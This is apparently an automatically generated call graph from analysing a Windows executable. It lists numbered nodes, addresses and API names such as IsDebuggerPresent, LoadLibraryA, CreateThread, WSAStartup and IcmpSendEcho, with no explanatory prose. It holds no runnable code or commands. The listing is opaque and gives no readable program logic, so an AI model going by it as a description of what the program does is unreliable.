99506 e35069 99506->99427 99508 e2332b __IsNonwritableInCurrentImage 99507->99508 99586 e2a701 99508->99586 99510 e23349 __initterm_e 99511 e22f70 __cinit 67 API calls 99510->99511 99512 e23368 __cinit __IsNonwritableInCurrentImage 99510->99512 99511->99512 99512->99431 99514 e15fa5 99513->99514 99524 e16044 99513->99524 99515 e15fdf IsThemeActive 99514->99515 99589 e2359c 99515->99589 99519 e1600b 99601 e15f00 SystemParametersInfoW SystemParametersInfoW 99519->99601 99521 e16017 99602 e15240 99521->99602 99523 e1601f SystemParametersInfoW 99523->99524 99524->99435 99525->99409 99526->99413 99527->99420 99531->99436 99532->99439 99533->99445 99534->99447 99535->99451 99536->99452 99538 e28a0c 99537->99538 99540 e28a47 99538->99540 99542 e28a2a 99538->99542 99546 e35426 99538->99546 99540->99456 99543 e2a016 TlsSetValue 99540->99543 99542->99538 99542->99540 99554 e2a362 Sleep 99542->99554 99543->99459 99544->99463 99545->99460 99547 e35431 99546->99547 99548 e3544c 99546->99548 99547->99548 99549 e3543d 99547->99549 99551 e3545c HeapAlloc 99548->99551 99552 e35442 99548->99552 99556 e235d1 DecodePointer 99548->99556 99555 e28d58 58 API calls __getptd_noexit 99549->99555 99551->99548 99551->99552 99552->99538 99554->99542 99555->99552 99556->99548 99557->99478 99558->99480 99559->99471 99560->99487 99561->99492 99562->99500 99564 e29001 99563->99564 99569 e28e89 99564->99569 99568 e2901c 99568->99506 99570 e28ea3 _memset ___raise_securityfailure 99569->99570 99571 e28ec3 IsDebuggerPresent 99570->99571 99577 e2a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99571->99577 99574 e28faa 99576 e2a370 GetCurrentProcess TerminateProcess 99574->99576 99575 e28f87 ___raise_securityfailure 99578 e2c826 99575->99578 99576->99568 99577->99575 99579 e2c830 IsProcessorFeaturePresent 99578->99579 99580 e2c82e 99578->99580 99582 e35b3a 99579->99582 99580->99574 99585 e35ae9 5 API calls ___raise_securityfailure 99582->99585 99584 e35c1d 99584->99574 99585->99584 99587 e2a704 EncodePointer 99586->99587 99587->99587 99588 e2a71e 99587->99588 99588->99510 99590 e29e3b __lock 58 API calls 99589->99590 99591 e235a7 DecodePointer EncodePointer 99590->99591 99654 e29fa5 LeaveCriticalSection 99591->99654 99593 e16004 99594 e23604 99593->99594 99595 e23628 99594->99595 99596 e2360e 99594->99596 99595->99519 99596->99595 99655 e28d58 58 API calls __getptd_noexit 99596->99655 99598 e23618 99656 e28fe6 9 API calls __cftoe_l 99598->99656 99600 e23623 99600->99519 99601->99521 99603 e1524d __ftell_nolock 99602->99603 99604 e11207 59 API calls 99603->99604 99605 e15258 GetCurrentDirectoryW 99604->99605 99657 e14ec8 99605->99657 99607 e1527e IsDebuggerPresent 99608 e50b21 MessageBoxA 99607->99608 99609 e1528c 99607->99609 99611 e50b39 99608->99611 99610 e152a0 99609->99610 99609->99611 99725 e131bf 99610->99725 99780 e1314d 59 API calls Mailbox 99611->99780 99618 e50b49 99621 e50b5f SetCurrentDirectoryW 99618->99621 99620 e1536c Mailbox 99620->99523 99621->99620 99654->99593 99655->99598 99656->99600 99658 e11207 59 API calls 99657->99658 99659 e14ede 99658->99659 99789 e15420 99659->99789 99661 e14efc 99662 e119e1 59 API calls 99661->99662 99663 e14f10 99662->99663 99664 e11c9c 59 API calls 99663->99664 99665 e14f1b 99664->99665 99666 e0477a 59 API calls 99665->99666 99667 e14f27 99666->99667 99668 e11a36 59 API calls 99667->99668 99669 e14f34 99668->99669 99670 e039be 68 API calls 99669->99670 99671 e14f44 Mailbox 99670->99671 99672 e11a36 59 API calls 99671->99672 99673 e14f68 99672->99673 99674 e039be 68 API calls 99673->99674 99675 e14f77 Mailbox 99674->99675 99676 e11207 59 API calls 99675->99676 99677 e14f94 99676->99677 99803 e155bc 99677->99803 99681 e14fae 99682 e50a54 99681->99682 99683 e14fb8 99681->99683 99684 e155bc 59 API calls 99682->99684 99685 e2312d _W_store_winword 60 API calls 99683->99685 99686 e50a68 99684->99686 99687 e14fc3 99685->99687 99689 e155bc 59 API calls 99686->99689 99687->99686 99688 e14fcd 99687->99688 99690 e2312d _W_store_winword 60 API calls 99688->99690 99691 e50a84 99689->99691 99692 e14fd8 99690->99692 99694 e200cf 61 API calls 99691->99694 99692->99691 99693 e14fe2 99692->99693 99695 e2312d _W_store_winword 60 API calls 99693->99695 99696 e50aa7 99694->99696 99697 e14fed 99695->99697 99698 e155bc 59 API calls 99696->99698 99699 e14ff7 99697->99699 99700 e50ad0 99697->99700 99701 e50ab3 99698->99701 99702 e1501b 99699->99702 99705 e11c9c 59 API calls 99699->99705 99703 e155bc 59 API calls 99700->99703 99704 e11c9c 59 API calls 99701->99704 99709 e047be 59 API calls 99702->99709 99706 e50aee 99703->99706 99707 e50ac1 99704->99707 99708 e1500e 99705->99708 99710 e11c9c 59 API calls 99706->99710 99711 e155bc 59 API calls 99707->99711 99712 e155bc 59 API calls 99708->99712 99713 e1502a 99709->99713 99714 e50afc 99710->99714 99711->99700 99712->99702 99715 e04540 59 API calls 99713->99715 99716 e155bc 59 API calls 99714->99716 99717 e15038 99715->99717 99718 e50b0b 99716->99718 99719 e043d0 59 API calls 99717->99719 99718->99718 99722 e15055 99719->99722 99720 e0477a 59 API calls 99720->99722 99721 e043d0 59 API calls 99721->99722 99722->99720 99722->99721 99723 e155bc 59 API calls 99722->99723 99724 e1509b Mailbox 99722->99724 99723->99722 99724->99607 99726 e131cc __ftell_nolock 99725->99726 99727 e50314 _memset 99726->99727 99728 e131e5 99726->99728 99731 e50330 GetOpenFileNameW 99727->99731 99729 e20284 60 API calls 99728->99729 99730 e131ee 99729->99730 99828 e209c5 99730->99828 99732 e5037f 99731->99732 99734 e11821 59 API calls 99732->99734 99736 e50394 99734->99736 99736->99736 99738 e13203 99846 e1278a 99738->99846 99780->99618 99790 e1542d __ftell_nolock 99789->99790 99791 e11821 59 API calls 99790->99791 99793 e15590 Mailbox 99790->99793 99794 e1545f 99791->99794 99792 e11609 59 API calls 99792->99794 99793->99661 99794->99792 99802 e15495 Mailbox 99794->99802 99795 e15563 99795->99793 99796 e11a36 59 API calls 99795->99796 99797 e15584 99796->99797 99799 e14c94 59 API calls 99797->99799 99798 e11a36 59 API calls 99798->99802 99799->99793 99800 e11609 59 API calls 99800->99802 99802->99793 99802->99795 99802->99798 99802->99800 99819 e14c94 99802->99819 99804 e155c6 99803->99804 99805 e155df 99803->99805 99806 e11c9c 59 API calls 99804->99806 99807 e11821 59 API calls 99805->99807 99808 e14fa0 99806->99808 99807->99808 99809 e2312d 99808->99809 99810 e23139 99809->99810 99811 e231ae 99809->99811 99818 e2315e 99810->99818 99825 e28d58 58 API calls __getptd_noexit 99810->99825 99827 e231c0 60 API calls 3 library calls 99811->99827 99814 e231bb 99814->99681 99815 e23145 99826 e28fe6 9 API calls __cftoe_l 99815->99826 99817 e23150 99817->99681 99818->99681 99820 e14ca2 99819->99820 99824 e14cc4 _memmove 99819->99824 99822 e20fe6 Mailbox 59 API calls 99820->99822 99821 e20fe6 Mailbox 59 API calls 99823 e14cd8 99821->99823 99822->99824 99823->99802 99824->99821 99825->99815 99826->99817 99827->99814 99829 e31b70 __ftell_nolock 99828->99829 99830 e209d2 GetLongPathNameW 99829->99830 99831 e11821 59 API calls 99830->99831 99832 e131f7 99831->99832 99833 e12f3d 99832->99833 99834 e11207 59 API calls 99833->99834 99835 e12f4f 99834->99835 99836 e20284 60 API calls 99835->99836 99837 e12f5a 99836->99837 99838 e50177 99837->99838 99839 e12f65 99837->99839 99840 e1151f 61 API calls 99838->99840 99843 e50191 99838->99843 99841 e14c94 59 API calls 99839->99841 99840->99838 99842 e12f71 99841->99842 99880 e01307 99842->99880 99845 e12f84 Mailbox 99845->99738 99886 e149c2 99846->99886 99881 e01319 99880->99881 99885 e01338 _memmove 99880->99885 99883 e20fe6 Mailbox 59 API calls 99881->99883 99882 e20fe6 Mailbox 59 API calls 99884 e0134f 99882->99884 99883->99885 99884->99845 99885->99882 100070 e14b29 99886->100070 99891 e149ed LoadLibraryExW 100080 e14ade 99891->100080 99892 e508bb 99893 e14a2f 84 API calls 99892->99893 99896 e508c2 99893->99896 99898 e14ade 3 API calls 99896->99898 99900 e508ca 99898->99900 99899 e14a14 99899->99900 99901 e14a20 99899->99901 100106 e14ab2 99900->100106 99907 e508f1 100114 e14a6e 99907->100114 100119 e14b77 100070->100119 100073 e14b50 100075 e14b60 FreeLibrary 100073->100075 100076 e149d4 100073->100076 100074 e14b77 2 API calls 100074->100073 100075->100076 100077 e2547b 100076->100077 100123 e25490 100077->100123 100079 e149e1 100079->99891 100079->99892 100204 e14baa 100080->100204 100083 e14b03 100085 e14b15 FreeLibrary 100083->100085 100086 e14a05 100083->100086 100084 e14baa 2 API calls 100084->100083 100085->100086 100087 e148b0 100086->100087 100088 e20fe6 Mailbox 59 API calls 100087->100088 100089 e148c5 100088->100089 100208 e1433f 100089->100208 100091 e148d1 _memmove 100092 e1490c 100091->100092 100093 e5080a 100091->100093 100094 e14a6e 69 API calls 100092->100094 100095 e50817 100093->100095 100216 e69ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100093->100216 100105 e14915 100094->100105 100217 e69f5e 95 API calls 100095->100217 100098 e14ab2 74 API calls 100098->100105 100100 e50859 100211 e14a8c 100100->100211 100102 e14a8c 85 API calls 100102->100105 100104 e149a0 100104->99899 100105->100098 100105->100100 100105->100102 100105->100104 100107 e50945 100106->100107 100108 e14ac4 100106->100108 100323 e25802 100108->100323 100111 e696c4 100448 e6951a 100111->100448 100113 e696da 100113->99907 100120 e14b44 100119->100120 100121 e14b80 LoadLibraryA 100119->100121 100120->100073 100120->100074 100121->100120 100122 e14b91 GetProcAddress 100121->100122 100122->100120 100126 e2549c __setmode 100123->100126 100124 e254af 100172 e28d58 58 API calls __getptd_noexit 100124->100172 100126->100124 100128 e254e0 100126->100128 100127 e254b4 100173 e28fe6 9 API calls __cftoe_l 100127->100173 100142 e30718 100128->100142 100131 e254e5 100132 e254fb 100131->100132 100133 e254ee 100131->100133 100135 e25525 100132->100135 100136 e25505 100132->100136 100174 e28d58 58 API calls __getptd_noexit 100133->100174 100157 e30837 100135->100157 100175 e28d58 58 API calls __getptd_noexit 100136->100175 100137 e254bf @_EH4_CallFilterFunc@8 __setmode 100137->100079 100143 e30724 __setmode 100142->100143 100144 e29e3b __lock 58 API calls 100143->100144 100145 e30732 100144->100145 100146 e307ad 100145->100146 100151 e29ec3 __mtinitlocknum 58 API calls 100145->100151 100155 e307a6 100145->100155 100180 e26e7d 59 API calls __lock 100145->100180 100181 e26ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100145->100181 100182 e28a4d 58 API calls 2 library calls 100146->100182 100149 e307b4 100149->100155 100183 e2a05b InitializeCriticalSectionAndSpinCount 100149->100183 100151->100145 100153 e30823 __setmode 100153->100131 100154 e307da EnterCriticalSection 100154->100155 100177 e3082e 100155->100177 100166 e30857 __wopenfile 100157->100166 100158 e30871 100188 e28d58 58 API calls __getptd_noexit 100158->100188 100159 e30a2c 100159->100158 100164 e30a8f 100159->100164 100161 e30876 100189 e28fe6 9 API calls __cftoe_l 100161->100189 100163 e25530 100176 e25552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100163->100176 100185 e387d1 100164->100185 100166->100158 100166->100159 100190 e239fb 60 API calls 2 library calls 100166->100190 100168 e30a25 100168->100159 100191 e239fb 60 API calls 2 library calls 100168->100191 100170 e30a44 100170->100159 100192 e239fb 60 API calls 2 library calls 100170->100192 100172->100127 100173->100137 100174->100137 100175->100137 100176->100137 100184 e29fa5 LeaveCriticalSection 100177->100184 100179 e30835 100179->100153 100180->100145 100181->100145 100182->100149 100183->100154 100184->100179 100193 e37fb5 100185->100193 100187 e387ea 100187->100163 100188->100161 100189->100163 100190->100168 100191->100170 100192->100159 100194 e37fc1 __setmode 100193->100194 100195 e37fd7 100194->100195 100198 e3800d 100194->100198 100196 e28d58 __cftoe_l 58 API calls 100195->100196 100197 e37fdc 100196->100197 100199 e28fe6 __cftoe_l 9 API calls 100197->100199 100200 e3807e __wsopen_nolock 109 API calls 100198->100200 100203 e37fe6 __setmode 100199->100203 100201 e38029 100200->100201 100202 e38052 __wsopen_helper LeaveCriticalSection 100201->100202 100202->100203 100203->100187 100205 e14af7 100204->100205 100206 e14bb3 LoadLibraryA 100204->100206 100205->100083 100205->100084 100206->100205 100207 e14bc4 GetProcAddress 100206->100207 100207->100205 100209 e20fe6 Mailbox 59 API calls 100208->100209 100210 e14351 100209->100210 100210->100091 100212 e14a9b 100211->100212 100215 e50923 100211->100215 100216->100095 100217->100105 100326 e2581d 100323->100326 100325 e14ad5 100325->100111 100327 e25829 __setmode 100326->100327 100328 e25864 __setmode 100327->100328 100329 e2583f _memset 100327->100329 100330 e2586c 100327->100330 100328->100325 100353 e28d58 58 API calls __getptd_noexit 100329->100353 100331 e26e3e __lock_file 59 API calls 100330->100331 100332 e25872 100331->100332 100339 e2563d 100332->100339 100335 e25859 100354 e28fe6 9 API calls __cftoe_l 100335->100354 100340 e25673 100339->100340 100342 e25658 _memset 100339->100342 100355 e258a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100340->100355 100341 e25663 100444 e28d58 58 API calls __getptd_noexit 100341->100444 100342->100340 100342->100341 100345 e256b3 100342->100345 100345->100340 100347 e257c4 _memset 100345->100347 100349 e24906 __stbuf 58 API calls 100345->100349 100356 e3108b 100345->100356 100424 e30dd7 100345->100424 100446 e30ef8 58 API calls 3 library calls 100345->100446 100447 e28d58 58 API calls __getptd_noexit 100347->100447 100349->100345 100352 e25668 100445 e28fe6 9 API calls __cftoe_l 100352->100445 100353->100335 100354->100328 100355->100328 100357 e310c3 100356->100357 100358 e310ac 100356->100358 100360 e317fb 100357->100360 100365 e310fd 100357->100365 100359 e28d24 __dosmaperr 58 API calls 100358->100359 100362 e310b1 100359->100362 100361 e28d24 __dosmaperr 58 API calls 100360->100361 100425 e30de2 100424->100425 100429 e30df7 100424->100429 100426 e28d58 __cftoe_l 58 API calls 100425->100426 100427 e30de7 100426->100427 100430 e30e2c 100429->100430 100431 e36214 __getbuf 58 API calls 100429->100431 100435 e30df2 100429->100435 100431->100430 100435->100345 100444->100352 100445->100340 100446->100345 100447->100352 100451 e2542a GetSystemTimeAsFileTime 100448->100451 100450 e69529 100450->100113 100452 e25458 __aulldiv 100451->100452 100452->100450 100708 e06981 100709 e0373a 59 API calls 100708->100709 100710 e06997 100709->100710 100715 e07b3f 100710->100715 100712 e069bf 100714 e0584d 100712->100714 100727 e6a48d 89 API calls 4 library calls 100712->100727 100716 e1162d 59 API calls 100715->100716 100717 e07b64 _wcscmp 100715->100717 100716->100717 100718 e11a36 59 API calls 100717->100718 100720 e07b98 Mailbox 100717->100720 100719 e3ffad 100718->100719 100721 e117e0 59 API calls 100719->100721 100720->100712 100722 e3ffb8 100721->100722 100728 e03938 68 API calls 100722->100728 100724 e3ffc9 100726 e3ffcd Mailbox 100724->100726 100729 e0523c 59 API calls 100724->100729 100726->100712 100727->100714 100728->100724 100729->100726 100730 e14d83 100731 e14dba 100730->100731 100732 e14e35 100731->100732 100733 e14e37 100731->100733 100734 e14dd8 100731->100734 100735 e14e1a DefWindowProcW 100732->100735 100736 e509c2 100733->100736 100737 e14e3d 100733->100737 100738 e14de5 100734->100738 100739 e14ead PostQuitMessage 100734->100739 100743 e14e28 100735->100743 100785 e0c460 10 API calls Mailbox 100736->100785 100744 e14e42 100737->100744 100745 e14e65 SetTimer RegisterWindowMessageW 100737->100745 100740 e50a35 100738->100740 100741 e14df0 100738->100741 100739->100743 100788 e62cce 97 API calls _memset 100740->100788 100746 e14eb7 100741->100746 100747 e14df8 100741->100747 100751 e50965 100744->100751 100752 e14e49 KillTimer 100744->100752 100745->100743 100748 e14e8e CreatePopupMenu 100745->100748 100775 e15b29 100746->100775 100753 e14e03 100747->100753 100754 e50a1a 100747->100754 100748->100743 100750 e509e9 100786 e0c483 298 API calls Mailbox 100750->100786 100758 e5099e MoveWindow 100751->100758 100759 e5096a 100751->100759 100760 e15ac3 Shell_NotifyIconW 100752->100760 100761 e14e9b 100753->100761 100762 e14e0e 100753->100762 100754->100735 100787 e58854 59 API calls Mailbox 100754->100787 100755 e50a47 100755->100735 100755->100743 100758->100743 100763 e5098d SetFocus 100759->100763 100764 e5096e 100759->100764 100765 e14e5c 100760->100765 100783 e15bd7 107 API calls _memset 100761->100783 100762->100735 100772 e15ac3 Shell_NotifyIconW 100762->100772 100763->100743 100764->100762 100767 e50977 100764->100767 100782 e034e4 DeleteObject DestroyWindow Mailbox 100765->100782 100784 e0c460 10 API calls Mailbox 100767->100784 100770 e14eab 100770->100743 100773 e50a0e 100772->100773 100774 e159d3 94 API calls 100773->100774 100774->100732 100776 e15b40 _memset 100775->100776 100777 e15bc2 100775->100777 100778 e156f8 87 API calls 100776->100778 100777->100743 100781 e15b67 100778->100781 100779 e15bab KillTimer SetTimer 100779->100777 100780 e50d6e Shell_NotifyIconW 100780->100779 100781->100779 100781->100780 100782->100743 100783->100770 100784->100743 100785->100750 100786->100762 100787->100732 100788->100755 100789 e01066 100790 e0106c 100789->100790 100791 e22f70 __cinit 67 API calls 100790->100791 100792 e01076 100791->100792 100793 e0ac27 100794 e11207 59 API calls 100793->100794 100795 e0ac39 100794->100795 100813 e20588 100795->100813 100799 e0ac6b 100800 e11207 59 API calls 100799->100800 100801 e0ac75 100800->100801 100841 e1fe2b 100801->100841 100803 e0acbc 100804 e0accc GetStdHandle 100803->100804 100805 e0ad18 100804->100805 100806 e42f39 100804->100806 100807 e0ad20 OleInitialize 100805->100807 100806->100805 100808 e42f42 100806->100808 100848 e670f3 64 API calls Mailbox 100808->100848 100810 e42f49 100849 e677c2 CreateThread 100810->100849 100812 e42f55 CloseHandle 100812->100807 100814 e11207 59 API calls 100813->100814 100815 e20598 100814->100815 100816 e11207 59 API calls 100815->100816 100817 e205a0 100816->100817 100850 e110c3 100817->100850 100820 e110c3 59 API calls 100821 e205b0 100820->100821 100822 e11207 59 API calls 100821->100822 100823 e205bb 100822->100823 100824 e20fe6 Mailbox 59 API calls 100823->100824 100825 e0ac43 100824->100825 100826 e1ff4c 100825->100826 100827 e1ff5a 100826->100827 100828 e11207 59 API calls 100827->100828 100829 e1ff65 100828->100829 100830 e11207 59 API calls 100829->100830 100831 e1ff70 100830->100831 100832 e11207 59 API calls 100831->100832 100833 e1ff7b 100832->100833 100834 e11207 59 API calls 100833->100834 100835 e1ff86 100834->100835 100836 e110c3 59 API calls 100835->100836 100837 e1ff91 100836->100837 100838 e20fe6 Mailbox 59 API calls 100837->100838 100839 e1ff98 RegisterWindowMessageW 100838->100839 100839->100799 100842 e5620c 100841->100842 100843 e1fe3b 100841->100843 100853 e6a12a 59 API calls 100842->100853 100844 e20fe6 Mailbox 59 API calls 100843->100844 100846 e1fe43 100844->100846 100846->100803 100847 e56217 100848->100810 100849->100812 100851 e11207 59 API calls 100850->100851 100852 e110cb 100851->100852 100852->100820 100853->100847 100854 e09a88 100857 e086e0 100854->100857 100858 e086fd 100857->100858 100859 e40fad 100858->100859 100860 e40ff8 100858->100860 100882 e08724 100858->100882 100863 e40fb5 100859->100863 100866 e40fc2 100859->100866 100859->100882 100897 e7aad0 298 API calls __cinit 100860->100897 100895 e7b0e4 298 API calls 100863->100895 100864 e22f70 __cinit 67 API calls 100864->100882 100881 e0898d 100866->100881 100896 e7b58c 298 API calls 3 library calls 100866->100896 100867 e03f42 68 API calls 100867->100882 100870 e03c30 68 API calls 100870->100882 100871 e41289 100871->100871 100872 e411af 100900 e7ae3b 89 API calls 100872->100900 100875 e08a17 100876 e039be 68 API calls 100876->100882 100881->100875 100901 e6a48d 89 API calls 4 library calls 100881->100901 100882->100864 100882->100867 100882->100870 100882->100872 100882->100875 100882->100876 100882->100881 100883 e053b0 298 API calls 100882->100883 100884 e11c9c 59 API calls 100882->100884 100886 e03938 68 API calls 100882->100886 100887 e0855e 298 API calls 100882->100887 100888 e05278 100882->100888 100893 e084e2 89 API calls 100882->100893 100894 e0835f 298 API calls 100882->100894 100898 e0523c 59 API calls 100882->100898 100899 e573ab 59 API calls 100882->100899 100883->100882 100884->100882 100886->100882 100887->100882 100889 e20fe6 Mailbox 59 API calls 100888->100889 100890 e05285 100889->100890 100891 e05294 100890->100891 100892 e11a36 59 API calls 100890->100892 100891->100882 100892->100891 100893->100882 100894->100882 100895->100866 100896->100881 100897->100882 100898->100882 100899->100882 100900->100881 100901->100871 100902 e09a6c 100905 e0829c 100902->100905 100904 e09a78 100906 e082b4 100905->100906 100913 e08308 100905->100913 100907 e053b0 298 API calls 100906->100907 100906->100913 100911 e082eb 100907->100911 100909 e40ed8 100909->100909 100910 e08331 100910->100904 100911->100910 100914 e0523c 59 API calls 100911->100914 100913->100910 100915 e6a48d 89 API calls 4 library calls 100913->100915 100914->100913 100915->100909 100916 e01055 100921 e02a19 100916->100921 100919 e22f70 __cinit 67 API calls 100920 e01064 100919->100920 100922 e11207 59 API calls 100921->100922 100923 e02a87 100922->100923 100928 e01256 100923->100928 100926 e02b24 100927 e0105a 100926->100927 100931 e013f8 59 API calls 2 library calls 100926->100931 100927->100919 100932 e01284 100928->100932 100931->100926 100933 e01291 100932->100933 100934 e01275 100932->100934 100933->100934 100935 e01298 RegOpenKeyExW 100933->100935 100934->100926 100935->100934 100936 e012b2 RegQueryValueExW 100935->100936 100937 e012d3 100936->100937 100938 e012e8 RegCloseKey 100936->100938 100937->100938 100938->100934 100939 e05ff5 100947 e05ede Mailbox _memmove 100939->100947 100940 e20fe6 59 API calls Mailbox 100940->100947 100941 e06a9b 101165 e0a9de 298 API calls 100941->101165 100942 e053b0 298 API calls 100942->100947 100944 e06abc 101175 e6a48d 89 API calls 4 library calls 100944->101175 100945 e3eff9 101177 e05190 59 API calls Mailbox 100945->101177 100947->100940 100947->100941 100947->100942 100947->100944 100947->100945 100948 e3f007 100947->100948 100953 e060e5 100947->100953 100956 e11c9c 59 API calls 100947->100956 100958 e11a36 59 API calls 100947->100958 100962 e7c355 298 API calls 100947->100962 100996 e05569 Mailbox 100947->100996 101164 e0523c 59 API calls 100947->101164 101169 e67f11 59 API calls Mailbox 100947->101169 101170 e56cf1 59 API calls Mailbox 100947->101170 101178 e6a48d 89 API calls 4 library calls 100948->101178 100950 e3efeb 100950->100996 101176 e56cf1 59 API calls Mailbox 100950->101176 100953->100944 100954 e063bd Mailbox 100953->100954 100955 e3e137 100953->100955 100978 e06152 Mailbox 100953->100978 100961 e20fe6 Mailbox 59 API calls 100954->100961 100970 e06426 100954->100970 100955->100954 101166 e57aad 59 API calls 100955->101166 100956->100947 100958->100947 100963 e063d1 100961->100963 100962->100947 100963->100944 100964 e063de 100963->100964 100965 e3e172 100964->100965 100966 e06413 100964->100966 101167 e7c87c 85 API calls 2 library calls 100965->101167 100966->100970 100995 e05447 Mailbox 100966->100995 101168 e7c9c9 95 API calls Mailbox 100970->101168 100972 e3e19d 100972->100972 100974 e3e691 101172 e6a48d 89 API calls 4 library calls 100974->101172 100975 e3f165 101180 e6a48d 89 API calls 4 library calls 100975->101180 100976 e069fa 100984 e11c9c 59 API calls 100976->100984 100978->100944 100978->100950 100986 e3e2e9 VariantClear 100978->100986 100978->100996 101001 e7f1b2 91 API calls 100978->101001 101006 e7e60c 130 API calls 100978->101006 101007 e6412a 3 API calls 100978->101007 101010 e6d6be 100978->101010 101055 e0cfd7 100978->101055 101074 e75e1d 100978->101074 101099 e727a9 100978->101099 101118 e6413a 100978->101118 101121 e0d679 100978->101121 101163 e05190 59 API calls Mailbox 100978->101163 101171 e57aad 59 API calls 100978->101171 100981 e20fe6 59 API calls Mailbox 100981->100995 100982 e3e6a0 100983 e069ff 100983->100974 100983->100975 100984->100996 100986->100978 100987 e3ea9a 100991 e11c9c 59 API calls 100987->100991 100988 e11c9c 59 API calls 100988->100995 100989 e11207 59 API calls 100989->100995 100991->100996 100992 e57aad 59 API calls 100992->100995 100993 e3eb67 100993->100996 101173 e57aad 59 API calls 100993->101173 100995->100974 100995->100976 100995->100981 100995->100983 100995->100987 100995->100988 100995->100989 100995->100992 100995->100993 100995->100996 100997 e22f70 67 API calls __cinit 100995->100997 100998 e3ef28 100995->100998 101000 e05a1a 100995->101000 101161 e07e50 298 API calls 2 library calls 100995->101161 101162 e06e30 60 API calls Mailbox 100995->101162 100997->100995 101174 e6a48d 89 API calls 4 library calls 100998->101174 101179 e6a48d 89 API calls 4 library calls 101000->101179 101001->100978 101006->100978 101007->100978 101011 e6d6e8 101010->101011 101012 e6d6dd 101010->101012 101016 e11207 59 API calls 101011->101016 101053 e6d7c2 Mailbox 101011->101053 101013 e0502b 59 API calls 101012->101013 101013->101011 101014 e20fe6 Mailbox 59 API calls 101015 e6d80b 101014->101015 101019 e6d817 101015->101019 101181 e13df7 60 API calls Mailbox 101015->101181 101017 e6d70c 101016->101017 101020 e11207 59 API calls 101017->101020 101021 e04d37 84 API calls 101019->101021 101022 e6d715 101020->101022 101023 e6d82f 101021->101023 101024 e04d37 84 API calls 101022->101024 101025 e13e47 67 API calls 101023->101025 101026 e6d721 101024->101026 101027 e6d83e 101025->101027 101028 e20119 59 API calls 101026->101028 101029 e6d876 101027->101029 101030 e6d842 GetLastError 101027->101030 101031 e6d736 101028->101031 101034 e6d8a1 101029->101034 101035 e6d8d8 101029->101035 101032 e6d85b 101030->101032 101033 e117e0 59 API calls 101031->101033 101051 e6d7cb Mailbox 101032->101051 101182 e13f0b CloseHandle 101032->101182 101036 e6d769 101033->101036 101038 e20fe6 Mailbox 59 API calls 101034->101038 101037 e20fe6 Mailbox 59 API calls 101035->101037 101039 e6412a 3 API calls 101036->101039 101054 e6d793 Mailbox 101036->101054 101040 e6d8dd 101037->101040 101041 e6d8a6 101038->101041 101044 e6d779 101039->101044 101046 e11207 59 API calls 101040->101046 101040->101051 101045 e6d8b7 101041->101045 101047 e11207 59 API calls 101041->101047 101043 e0502b 59 API calls 101043->101053 101048 e11a36 59 API calls 101044->101048 101044->101054 101183 e6fc0d 59 API calls 2 library calls 101045->101183 101046->101051 101047->101045 101050 e6d78a 101048->101050 101052 e63f1d 63 API calls 101050->101052 101051->100978 101052->101054 101053->101014 101053->101051 101054->101043 101056 e04d37 84 API calls 101055->101056 101057 e0d001 101056->101057 101058 e05278 59 API calls 101057->101058 101059 e0d018 101058->101059 101060 e0d57b 101059->101060 101061 e0502b 59 API calls 101059->101061 101070 e0d439 Mailbox __wsetenvp 101059->101070 101060->100978 101061->101070 101062 e2312d _W_store_winword 60 API calls 101062->101070 101063 e1162d 59 API calls 101063->101070 101064 e20c65 62 API calls 101064->101070 101066 e04f98 59 API calls 101066->101070 101068 e04d37 84 API calls 101068->101070 101069 e11821 59 API calls 101069->101070 101070->101060 101070->101062 101070->101063 101070->101064 101070->101066 101070->101068 101070->101069 101071 e15ac3 Shell_NotifyIconW 101070->101071 101072 e0502b 59 API calls 101070->101072 101073 e159d3 94 API calls 101070->101073 101184 e1153b 59 API calls 2 library calls 101070->101184 101185 e04f3c 59 API calls Mailbox 101070->101185 101071->101070 101072->101070 101073->101070 101075 e75e46 101074->101075 101076 e75e74 WSAStartup 101075->101076 101078 e0502b 59 API calls 101075->101078 101077 e75e9d 101076->101077 101089 e75e88 Mailbox 101076->101089 101079 e140cd 59 API calls 101077->101079 101080 e75e61 101078->101080 101081 e75ea6 101079->101081 101080->101076 101083 e0502b 59 API calls 101080->101083 101082 e04d37 84 API calls 101081->101082 101084 e75eb2 101082->101084 101085 e75e70 101083->101085 101086 e1402a 61 API calls 101084->101086 101085->101076 101087 e75ebf inet_addr gethostbyname 101086->101087 101088 e75edd IcmpCreateFile 101087->101088 101087->101089 101088->101089 101090 e75f01 101088->101090 101089->100978 101091 e20fe6 Mailbox 59 API calls 101090->101091 101092 e75f1a 101091->101092 101093 e1433f 59 API calls 101092->101093 101094 e75f25 101093->101094 101095 e75f55 IcmpSendEcho 101094->101095 101096 e75f34 IcmpSendEcho 101094->101096 101098 e75f6d 101095->101098 101096->101098 101097 e75fd4 IcmpCloseHandle WSACleanup 101097->101089 101098->101097 101100 e727c3 101099->101100 101101 e727ce 101099->101101 101102 e0502b 59 API calls 101100->101102 101103 e04d37 84 API calls 101101->101103 101102->101101 101104 e727e0 101103->101104 101186 e71aa6 101104->101186 101119 e6494a 3 API calls 101118->101119 101120 e6413f 101119->101120 101120->100978 101191 e04f98 101121->101191 101125 e20fe6 Mailbox 59 API calls 101126 e0d6aa 101125->101126 101128 e0d6ba 101126->101128 101218 e13df7 60 API calls Mailbox 101126->101218 101127 e45068 101138 e0d6df 101127->101138 101223 e6fbb7 59 API calls 101127->101223 101130 e04d37 84 API calls 101128->101130 101132 e0d6c8 101130->101132 101131 e0502b 59 API calls 101134 e450b0 101131->101134 101133 e13e47 67 API calls 101132->101133 101137 e0d6d7 101133->101137 101135 e0d6ec 101134->101135 101136 e450b8 101134->101136 101204 e141d6 101135->101204 101140 e0502b 59 API calls 101136->101140 101137->101127 101137->101138 101222 e13f0b CloseHandle 101137->101222 101138->101131 101138->101135 101142 e0d6f3 101140->101142 101143 e0d70d 101142->101143 101144 e450ca 101142->101144 101145 e11207 59 API calls 101143->101145 101146 e20fe6 Mailbox 59 API calls 101144->101146 101148 e0d715 101145->101148 101147 e450d0 101146->101147 101149 e450e4 101147->101149 101151 e13ea1 2 API calls 101147->101151 101219 e13b7b 65 API calls Mailbox 101148->101219 101155 e450e8 _memmove 101149->101155 101209 e67c7f 101149->101209 101151->101149 101153 e0d724 101153->101155 101220 e04f3c 59 API calls Mailbox 101153->101220 101156 e0d738 Mailbox 101157 e0d772 101156->101157 